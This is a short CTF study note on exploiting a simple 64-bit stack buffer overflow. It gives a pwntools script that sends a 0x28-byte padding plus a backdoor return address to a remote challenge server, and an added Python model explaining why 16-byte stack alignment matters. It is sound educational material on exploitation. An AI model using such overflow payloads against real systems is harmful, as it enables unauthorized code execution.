My First CTF: PWN Study Notes 15
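A very simple stack overflow with no tricks at all. Just make sure to take the address after the `push` instruction, so that the program stays 8-byte aligned.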
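```python
from pwn import *

# The target is a 64-bit binary (8-byte saved rbp, p64 return address)
context.arch = 'amd64'
context.os = 'linux'

# io = process('./pwn')  # local testing
io = remote("node4.anna.nssctf.cn", 28089)

# Address in the backdoor function, taken after its push instruction
backdoor = 0x40072D

# 0x20 bytes of buffer + 8 bytes of saved rbp, then the return address
payload = cyclic(0x20 + 8) + p64(backdoor)
io.sendline(payload)
io.interactive()
```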
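Why the address after the `push` matters, as an added example that is not part of the original notes: on x86-64 Linux the System V ABI expects `rsp` to be 16-byte aligned at a `call`, and entering a function through an overwritten return address instead of a `call` leaves `rsp` 8 bytes off. The model below tracks only `rsp` modulo 16 and assumes the backdoor begins with `push rbp; mov rbp, rsp` and then calls `system()` without adjusting `rsp` further; the notes do not show the disassembly, and the path names are hypothetical labels.

```python
# Added example: tracks rsp modulo 16 only; it does not model the real binary.
# Assumption: the backdoor starts with `push rbp; mov rbp, rsp` and then calls
# system() without any further change to rsp.

STEPS = {
    "call": -8,             # pushes the return address
    "push rbp": -8,         # function prologue
    "sub rsp,0x20": -0x20,  # the 0x20-byte buffer from the payload offset
    "leave": 0x20 + 8,      # mov rsp, rbp ; pop rbp
    "ret": +8,              # pops the (possibly overwritten) return address
}

# The vulnerable function from its call to its return.
VULN_RETURNS = ["call", "push rbp", "sub rsp,0x20", "leave", "ret"]


def rsp_mod16(steps, start=0):
    """Apply stack steps; start=0 means rsp is aligned just before the call."""
    rsp = start
    for step in steps:
        rsp = (rsp + STEPS[step]) % 16
    return rsp


def alignment_at_system_call(path):
    """Return rsp % 16 at the backdoor's `call system` for one entry path."""
    if path == "normal call":
        steps = ["call", "push rbp"]
    elif path == "return to entry":
        steps = VULN_RETURNS + ["push rbp"]
    elif path == "return after push":
        steps = VULN_RETURNS
    else:
        raise ValueError(f"unknown path: {path}")
    return rsp_mod16(steps)


if __name__ == "__main__":
    for path in ("normal call", "return to entry", "return after push"):
        mod = alignment_at_system_call(path)
        state = "aligned" if mod == 0 else "misaligned"
        print(f"{path:18} rsp % 16 = {mod:2} ({state})")
```

A misaligned `rsp` typically shows up as a crash on an SSE instruction such as `movaps` inside libc, which is a useful signature when triaging crash dumps from this kind of bug.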